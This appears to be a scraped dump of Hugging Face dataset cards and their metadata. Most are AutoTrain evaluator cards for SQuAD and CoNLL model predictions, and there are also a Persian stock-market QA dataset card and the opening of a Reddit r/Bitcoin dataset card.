"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
a6036b2dcc7768e2940fcab790fd0a42fa5a387d | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-8b8e12f7-11715560 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T06:28:43+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": ["squad_v2"], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T06:33:16+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
eee0a8ef4396cb4882284ec2fda1d0ccfd8d5550 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: Shanny/bert-finetuned-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ola13](https://huggingface.co/ola13) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-810261fd-11725561 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T08:33:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "Shanny/bert-finetuned-squad", "metrics": ["accuracy"], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T08:36:36+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: Shanny/bert-finetuned-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ola13 for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: Shanny/bert-finetuned-squad\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ola13 for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: Shanny/bert-finetuned-squad\n* Dataset: squad\n* Config: plain_text\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ola13 for evaluating this model."
] |
1439a395520ae8c2068bad1e1b07b8d5f052b9be | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-ebf1ec50-11735562 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:33:05+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:37:39+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
09d0cf6b8b8cf1c47c25270219270ee5b2207921 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745564 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:37:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinyroberta-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:40:25+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinyroberta-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinyroberta-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
55b56822e4f31bfb149e822c0004ad25ad90fb94 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745565 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:37:49+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:42:15+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
15a9bdb8362664a48997e28994c2baf46eaa71f2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e85023ec-11745563 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:38:34+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:47:52+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
87c34d7017c665a0bb76b416bcfb62bfe17a2ae6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-26568076-11755566 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T10:49:05+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-large-uncased-whole-word-masking-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T10:53:57+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-large-uncased-whole-word-masking-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-large-uncased-whole-word-masking-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-large-uncased-whole-word-masking-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
de7be88799fc7659e1e51edbcf4a85f37d249e05 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@MichelBartels](https://huggingface.co/MichelBartels) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-df3d9ae8-11765567 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T11:05:23+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/deberta-v3-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T11:13:39+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/deberta-v3-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @MichelBartels for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @MichelBartels for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/deberta-v3-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @MichelBartels for evaluating this model."
] |
9d347362dc8663670ef1512728cdaccf282ef29b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Token Classification
* Model: AJGP/bert-finetuned-ner
* Dataset: conll2003
* Config: conll2003
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@hrezaeim](https://huggingface.co/hrezaeim) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-conll2003-2dc2f6d8-11805572 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T13:25:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["conll2003"], "eval_info": {"task": "entity_extraction", "model": "AJGP/bert-finetuned-ner", "metrics": [], "dataset_name": "conll2003", "dataset_config": "conll2003", "dataset_split": "test", "col_mapping": {"tokens": "tokens", "tags": "ner_tags"}}} | 2022-07-25T13:27:10+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Token Classification
* Model: AJGP/bert-finetuned-ner
* Dataset: conll2003
* Config: conll2003
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @hrezaeim for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Token Classification\n* Model: AJGP/bert-finetuned-ner\n* Dataset: conll2003\n* Config: conll2003\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @hrezaeim for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Token Classification\n* Model: AJGP/bert-finetuned-ner\n* Dataset: conll2003\n* Config: conll2003\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @hrezaeim for evaluating this model."
] |
249e666291cd556d0c0c7967ee3cb6967d77b56c |
# Dataset Card for Stock-QA-fa
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
[More Information Needed]
### Supported Tasks and Leaderboards
This dataset is intended to serve as a reference for QA tasks.
### Languages
Persian
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
All annotations are done according to the SQuAD2.0 data format.
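For reference, a SQuAD2.0-style record has the shape below (all field values are placeholders; only the structure matters):

```python
# Placeholder values; the structure follows the SQuAD2.0 JSON format.
squad_v2_example = {
    "version": "v2.0",
    "data": [
        {
            "title": "<document title>",
            "paragraphs": [
                {
                    "context": "<passage text>",
                    "qas": [
                        {
                            "id": "<unique id>",
                            "question": "<question text>",
                            "is_impossible": False,
                            "answers": [
                                {"text": "<answer span>", "answer_start": 42},
                            ],
                        }
                    ],
                }
            ],
        }
    ],
}
```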
### Source Data
#### Initial Data Collection and Normalization
All contexts and some of the questions are retrieved from [Faradars Introductory Course to Stock Market](https://blog.faradars.org/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%88%d8%b1%d8%b3-%d8%b1%d8%a7%db%8c%da%af%d8%a7%d9%86/).
#### Who are the source language producers?
Persian (Farsi)
### Annotations
#### Annotation process
All annotations are done via the Deepset Haystack annotation tool.
#### Who are the annotators?
Hesam Damghanian (this HF account)
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
| hdamghanian/Stock-QA-fa | [
"license:mit",
"region:us"
] | 2022-07-25T14:06:08+00:00 | {"license": "mit"} | 2022-07-25T14:16:43+00:00 | [] | [] | TAGS
#license-mit #region-us
|
# Dataset Card for Stock-QA-fa
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage:
- Repository:
- Paper:
- Leaderboard:
- Point of Contact:
### Dataset Summary
### Supported Tasks and Leaderboards
This dataset is intended to serve as a reference for QA tasks.
### Languages
Persian
## Dataset Structure
### Data Instances
### Data Fields
### Data Splits
## Dataset Creation
### Curation Rationale
All annotations are done according to the SQuAD2.0 data format.
### Source Data
#### Initial Data Collection and Normalization
All contexts and some of the questions are retrieved from Faradars Introductory Course to Stock Market.
#### Who are the source language producers?
Persian (Farsi)
### Annotations
#### Annotation process
All annotations are done via the Deepset Haystack annotation tool.
#### Who are the annotators?
Hesam Damghanian (this HF account)
## Considerations for Using the Data
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
## Additional Information
### Dataset Curators
### Licensing Information
| [
"# Dataset Card for [Dataset Name]",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage:\n- Repository:\n- Paper:\n- Leaderboard:\n- Point of Contact:",
"### Dataset Summary",
"### Supported Tasks and Leaderboards\n\nThis dataset is to be served as a reference for QA tasks.",
"### Languages\n\nPersian",
"## Dataset Structure",
"### Data Instances",
"### Data Fields",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale\n\nAll annotations are done according to the SQuAD2.0 data format.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nAll context and some of questions are retrieved from Faradars Introductory Course to Stock Market.",
"#### Who are the source language producers?\n\nPersian (farsi)",
"### Annotations",
"#### Annotation process\n\nAll annotations are done via Deepset Haystack annotation tool.",
"#### Who are the annotators?\n\nHesam Damghanian (this HF account)",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information"
] | [
"TAGS\n#license-mit #region-us \n",
"# Dataset Card for [Dataset Name]",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage:\n- Repository:\n- Paper:\n- Leaderboard:\n- Point of Contact:",
"### Dataset Summary",
"### Supported Tasks and Leaderboards\n\nThis dataset is to be served as a reference for QA tasks.",
"### Languages\n\nPersian",
"## Dataset Structure",
"### Data Instances",
"### Data Fields",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale\n\nAll annotations are done according to the SQuAD2.0 data format.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nAll context and some of questions are retrieved from Faradars Introductory Course to Stock Market.",
"#### Who are the source language producers?\n\nPersian (farsi)",
"### Annotations",
"#### Annotation process\n\nAll annotations are done via Deepset Haystack annotation tool.",
"#### Who are the annotators?\n\nHesam Damghanian (this HF account)",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information"
] |
3038d9967602ee1ba85340246bcd49bb52fd3bef |
# Dataset Card for reddit-r-bitcoin-data-for-jun-2022
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Homepage:** [https://socialgrep.com/datasets](https://socialgrep.com/datasets/reddit-r-bitcoin-data-for-jun-2022?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
- **Reddit downloader used:** [https://socialgrep.com/exports](https://socialgrep.com/exports?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
- **Point of Contact:** [Website](https://socialgrep.com/contact?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022)
### Dataset Summary
Lite version of our premium [Reddit /r/Bitcoin dataset](https://socialgrep.com/datasets/the-reddit-r-bitcoin-dataset?utm_source=huggingface&utm_medium=link&utm_campaign=redditrbitcoindataforjun2022) - CSV of all posts & comments to the /r/Bitcoin subreddit over Jun 2022.
### Languages
Mainly English.
## Dataset Structure
### Data Instances
A data point is a post or a comment. Due to the separate nature of the two, those exist in two different files - even though many fields are shared.
### Data Fields
- 'type': the type of the data point. Can be 'post' or 'comment'.
- 'id': the base-36 Reddit ID of the data point. Unique when combined with type.
- 'subreddit.id': the base-36 Reddit ID of the data point's host subreddit. Unique.
- 'subreddit.name': the human-readable name of the data point's host subreddit.
